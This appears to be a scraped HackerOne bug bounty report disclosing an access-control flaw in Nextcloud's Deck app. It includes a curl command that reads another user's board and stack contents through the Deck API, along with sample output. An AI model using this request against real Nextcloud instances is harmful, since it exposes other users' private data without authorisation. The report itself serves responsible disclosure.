Lucene search

K
hackeroneShakierbellowsH1:1331728
HistorySep 07, 2021 - 11:21 a.m.

Nextcloud: Cards in Deck are readable by any user

2021-09-0711:21:19
shakierbellows
hackerone.com
27
nextcloud
sensitive information
security breach
user access
bug bounty

EPSS

0.001

Percentile

43.0%

Summary:

Allows any user access to sensitive deck card contents.

Steps To Reproduce:

  1. User creates a new “deck” and “stack”.
  2. Create another user on your Nextcloud instance.
  3. curl -X GET -H “OCS-APIREQUEST: true” “http://localhost/index.php/apps/deck/api/v1.0/boards/1/stacks/1” -u hacker

As an output you get things like for example {title":“To do”,“cards”:[{“title”:“Example Task 3”,"}

Impact

Allows any user access to sensitive deck card contents.

EPSS

0.001

Percentile

43.0%